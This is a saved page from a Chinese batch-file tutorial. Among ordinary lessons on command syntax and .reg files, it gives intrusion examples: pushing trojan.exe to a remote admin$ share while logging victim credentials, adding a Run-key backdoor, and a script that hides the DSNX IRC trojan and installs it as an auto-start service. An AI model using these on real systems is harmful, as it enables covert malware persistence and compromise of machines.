📄 bat文件cmd文件_百度百科.htm
字号:
<div class="spctrl"></div> 2002-05-14 23:55 <DIR> .<br />
<div class="spctrl"></div> 2002-05-14 23:55 <DIR> ..<br />
<div class="spctrl"></div> 2002-05-14 23:55 14 sometips.gif<br />
<div class="spctrl"></div> 1 File(s) 14 bytes<br />
<div class="spctrl"></div> 2 Dir(s) 768,671,744 bytes free<br />
<div class="spctrl"></div> The system cannot find the path specified.<br />
<div class="spctrl"></div> 在做备份的时候可能会用到这种命令会比较简单,如:<br />
<div class="spctrl"></div> dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup<br />
<div class="spctrl"></div> 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :)<br />
<div class="spctrl"></div> 3.||<br />
<div class="spctrl"></div> Usage:第一条命令 || 第二条命令 [|| 第三条命令...]<br />
<div class="spctrl"></div> 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;<br />
<div class="spctrl"></div> Sample:<br />
<div class="spctrl"></div> C:\Ex4rch>dir sometips.gif || del sometips.gif<br />
<div class="spctrl"></div> Volume in drive C has no label.<br />
<div class="spctrl"></div> Volume Serial Number is 0078-59FB<br />
<div class="spctrl"></div> Directory of C:\Ex4rch<br />
<div class="spctrl"></div> 2002-05-14 23:55 14 sometips.gif<br />
<div class="spctrl"></div> 1 File(s) 14 bytes<br />
<div class="spctrl"></div> 0 Dir(s) 768,696,320 bytes free<br />
<div class="spctrl"></div> 组合命令使用的例子:<br />
<div class="spctrl"></div> sample:<br />
<div class="spctrl"></div> @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt <br />
<div class="spctrl"></div> 四、管道命令的使用<br />
<div class="spctrl"></div> 1.| 命令<br />
<div class="spctrl"></div> Usage:第一条命令 | 第二条命令 [| 第三条命令...]<br />
<div class="spctrl"></div> 将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。<br />
<div class="spctrl"></div> sample:<br />
<div class="spctrl"></div> time /t>>D:\IP.log<br />
<div class="spctrl"></div> netstat -n -p tcp|find ":3389">>D:\IP.log<br />
<div class="spctrl"></div> start Explorer<br />
<div class="spctrl"></div> 看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。<br />
<div class="spctrl"></div> 2.>、>>输出重定向命令<br />
<div class="spctrl"></div> 将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。<br />
<div class="spctrl"></div> sample1:<br />
<div class="spctrl"></div> echo hello world>c:\hello.txt (stupid example?)<br />
<div class="spctrl"></div> sample2:<br />
<div class="spctrl"></div> 时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:<br />
<div class="spctrl"></div> 运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,<br />
<div class="spctrl"></div> 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,<br />
<div class="spctrl"></div> 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.<br />
<div class="spctrl"></div> 这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:<br />
<div class="spctrl"></div> CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。<br />
<div class="spctrl"></div> 3.< 、>& 、<&<br />
<div class="spctrl"></div> < 从文件中而不是从键盘中读入命令输入。<br />
<div class="spctrl"></div> >& 将一个句柄的输出写入到另一个句柄的输入中。<br />
<div class="spctrl"></div> <& 从一个句柄读取输入并将其写入到另一个句柄输出中。<br />
<div class="spctrl"></div> 这些并不常用,也就不多做介绍。<br />
<div class="spctrl"></div> No.5<br />
<div class="spctrl"></div> 五.如何用批处理文件来操作注册表<br />
<div class="spctrl"></div> 在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)<br />
<div class="spctrl"></div> 关于注册表的操作,常见的是创建、修改、删除。<br />
<div class="spctrl"></div> 1.创建<br />
<div class="spctrl"></div> 创建分为两种,一种是创建子项(Subkey)<br />
<div class="spctrl"></div> 我们创建一个文件,内容如下:<br />
<div class="spctrl"></div> Windows Registry Editor Version 5.00<br />
<div class="spctrl"></div> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]<br />
<div class="spctrl"></div> 然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。<br />
<div class="spctrl"></div> 另一种是创建一个项目名称<br />
<div class="spctrl"></div> 那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:<br />
<div class="spctrl"></div> Windows Registry Editor Version 5.00<br />
<div class="spctrl"></div> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />
<div class="spctrl"></div> "Invader"="Ex4rch"<br />
<div class="spctrl"></div> "Door"=C:\\WINNT\\system32\\door.exe<br />
<div class="spctrl"></div> "Autodos"=dword:02<br />
<div class="spctrl"></div> 这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下<br />
<div class="spctrl"></div> 新建了:Invader、door、about这三个项目<br />
<div class="spctrl"></div> Invader的类型是“String value”<br />
<div class="spctrl"></div> door的类型是“REG SZ value”<br />
<div class="spctrl"></div> Autodos的类型是“DWORD value”<br />
<div class="spctrl"></div> 2.修改<br />
<div class="spctrl"></div> 修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。<br />
<div class="spctrl"></div> 3.删除<br />
<div class="spctrl"></div> 我们首先来说说删除一个项目名称,我们创建一个如下的文件:<br />
<div class="spctrl"></div> Windows Registry Editor Version 5.00<br />
<div class="spctrl"></div> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />
<div class="spctrl"></div> "Ex4rch"=-<br />
<div class="spctrl"></div> 执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;<br />
<div class="spctrl"></div> 我们再看看删除一个子项,我们创建一个如下的脚本:<br />
<div class="spctrl"></div> Windows Registry Editor Version 5.00<br />
<div class="spctrl"></div> [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />
<div class="spctrl"></div> 执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。<br />
<div class="spctrl"></div> 相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。<br />
<div class="spctrl"></div> samlpe1:如上面的那个例子,如想生成如下注册表文件<br />
<div class="spctrl"></div> Windows Registry Editor Version 5.00<br />
<div class="spctrl"></div> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />
<div class="spctrl"></div> "Invader"="Ex4rch"<br />
<div class="spctrl"></div> "door"=hex:255<br />
<div class="spctrl"></div> "Autodos"=dword:000000128<br />
<div class="spctrl"></div> 只需要这样:<br />
<div class="spctrl"></div> @echo Windows Registry Editor Version 5.00>>Sample.reg<br />
<div class="spctrl"></div> @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg<br />
<div class="spctrl"></div> @echo "Invader"="Ex4rch">>Sample.reg<br />
<div class="spctrl"></div> @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample. reg<br />
<div class="spctrl"></div> @echo "Autodos"=dword:02>>Sample.reg<br />
<div class="spctrl"></div> samlpe2:<br />
<div class="spctrl"></div> 我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为 windrv32.exe)<br />
<div class="spctrl"></div> @start windrv32.exe<br />
<div class="spctrl"></div> @attrib +h +r windrv32.exe<br />
<div class="spctrl"></div> @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll<br />
<div class="spctrl"></div> @echo "windsnx "=- >>patch.dll<br />
<div class="spctrl"></div> @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe<br />
<div class="spctrl"></div> @regedit /s patch.dll<br />
<div class="spctrl"></div> @delete patch.dll<br />
<div class="spctrl"></div> @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]<br />
<div class="spctrl"></div> @REM 这样不是更安全^_^. <br />
<div class="spctrl"></div> 六.精彩实例放送。<br />
<div class="spctrl"></div> 1.删除win2k/xp系统默认共享的批处理<br />
<div class="spctrl"></div> ------------------------ cut here then save as .bat or .cmd file ---------------------------<br />
<div class="spctrl"></div> @echo preparing to delete all the default shares.when ready pres any key.<br />
<div class="spctrl"></div> @pause<br />
<div class="spctrl"></div> @echo off<br />
<div class="spctrl"></div> :Rem check parameters if null show usage.<br />
<div class="spctrl"></div> if {%1}=={} goto :Usage<br />
<div class="spctrl"></div> :Rem code start.<br />
<div class="spctrl"></div> echo.<br />
<div class="spctrl"></div> echo ------------------------------------------------------<br />
<div class="spctrl"></div> echo.<br />
<div class="spctrl"></div> echo Now deleting all the default shares.<br />
<div class="spctrl"></div> echo.<br />
<div class="spctrl"></div> net share %1$ /delete<br />
<div class="spctrl"></div> net share %2$ /delete<br />
<div class="spctrl"></div> net share %3$ /delete<br />
<div class="spctrl"></div> net share %4$ /delete<br />
<div class="spctrl"></div> net share %5$ /delete<br />
<div class="spctrl"></div> net share %6$ /delete<br />
<div class="spctrl"></div> net share %7$ /delete<br />
<div class="spctrl"></div> net share %8$ /delete<br />
<div class="spctrl"></div> net share %9$ /delete<br />
<div class="spctrl"></div> net stop Server<br />
<div class="spctrl"></div> net start Server<br />
<div class="spctrl"></div> echo.<br />
<div class="spctrl"></div> echo All the shares have been deleteed<br />
<div class="spctrl"></div> echo.<br />
<div class="spctrl"></div> echo ------------------------------------------------------<br />
<div class="spctrl"></div> echo.<br />
<div class="spctrl"></div> echo Now modify the registry to change ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -